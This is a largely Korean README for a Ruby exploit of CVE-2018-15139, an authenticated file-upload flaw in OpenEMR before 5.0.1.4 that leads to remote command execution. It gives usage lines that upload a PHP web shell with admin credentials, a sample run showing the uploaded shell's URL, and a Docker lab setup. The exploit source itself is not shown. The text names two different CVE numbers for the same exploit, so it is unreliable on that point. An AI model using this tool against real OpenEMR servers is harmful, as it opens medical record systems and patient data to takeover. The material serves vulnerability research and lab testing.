
OpenEMR < 5.0.1.4 - (인증된) 파일 업로드 - 원격 명령 실행
OpenEMR < 5.0.1.4 - (인증된) 파일 업로드 - 원격 명령 실행
다음 취약점에 대한 익스플로잇: CVE-2018-15139.
$ ruby exploit.rb -h
OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution
Source: https://github.com/sec-it/exploit-CVE-2019-14530
Usage:
exploit.rb exploit <url> <filename> <username> <password> [--debug]
exploit.rb -h | --help
Options:
<url> 루트 URL (기본 경로). HTTP 스킴, 포트 및 루트 폴더 포함
<filename> 업로드할 셸의 파일명
<username> 관리자의 사용자명
<password> 관리자의 비밀번호
--debug 인수 표시
-h, --help 이 화면 표시
Examples:
exploit.rb exploit http://example.org/openemr shell.php admin pass
exploit.rb exploit https://example.org:5000/ shell.php admin pass
$ ruby exploit.rb exploit http://172.24.0.3 agent.php admin pass
[+] File uploaded:
http://172.24.0.3/sites/default/images/agent.php
gem 사용 예시:
bundle install
# or
gem install httpx docopt
경고: 이 설정은 당연히 프로덕션 환경에 적합하지 않습니다!
$ sudo docker-compose up
업로드 폴더 권한이 공식 OpenEMR Docker 이미지에서 손상되어 있으므로, 컨테이너에 접속하여 권한을 수정해야 합니다. 예:
$ sudo docker exec -ti exploit-cve-2018-15139_openemr_1 /bin/sh
$ chmod u+w /var/www/localhost/htdocs/openemr/sites/default/images/
docker-compose.yml 참조이것은 EDB-49998을 더 나은 버전으로 다시 작성한 것입니다.
취약점은 Project Insecurity가 발견했습니다.
원본 익스플로잇 및 취약점 분석: